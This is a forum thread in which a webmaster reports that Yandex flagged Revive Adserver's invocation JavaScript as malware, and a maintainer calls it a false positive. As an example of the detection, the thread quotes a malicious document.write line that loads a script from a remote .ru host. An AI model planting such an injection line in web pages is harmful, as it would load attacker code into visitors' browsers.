JRRTGimli Posted February 11, 2015 Report Posted February 11, 2015 I've placed a zone Invocation JS code on a page, and at the next day my site was marked as an infected one in russian search system "yandex.ru" (the most popular in Russia) and "Yandex browser" (over 30 million of users). They thinks, that I've placed a Mal/HappJS-A. Their example: document.write('<s'+'cript type="text/javascript" src="http://pantscow.ru:8080/Hibernate.js"></scr'+'ipt>'); I'm going to generate js on server to fix it, but another webmasters can get this trouble too. Quote
Erik Geurts Posted February 13, 2015 Report Posted February 13, 2015 http://www.openxconsultant.com/blog/2011/10/what-to-do-when-you-suspect-your-openx-system-has-been-hacked/ Quote
JRRTGimli Posted February 13, 2015 Author Report Posted February 13, 2015 Have you understood me?) My Adserver wasn't hacked! Yandex marks document.write('<s'+'cript (peace of standard Invocation code) as a Malware. It's problem of Revive Adserver. Quote
andrewatfornax Posted March 6, 2017 Report Posted March 6, 2017 Hi @JRRTGimli, It wasn't clear that this was what you meant from your original post, no. However, thanks for letting us know - there's not much we can do, though. Revive Adserver's code needs to do this to work, and it's unfortunate that some sites might consider it malware - but they are wrong. Short of completely re-writing the way delivery works in Revive Adserver, there's not much we can do about it. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.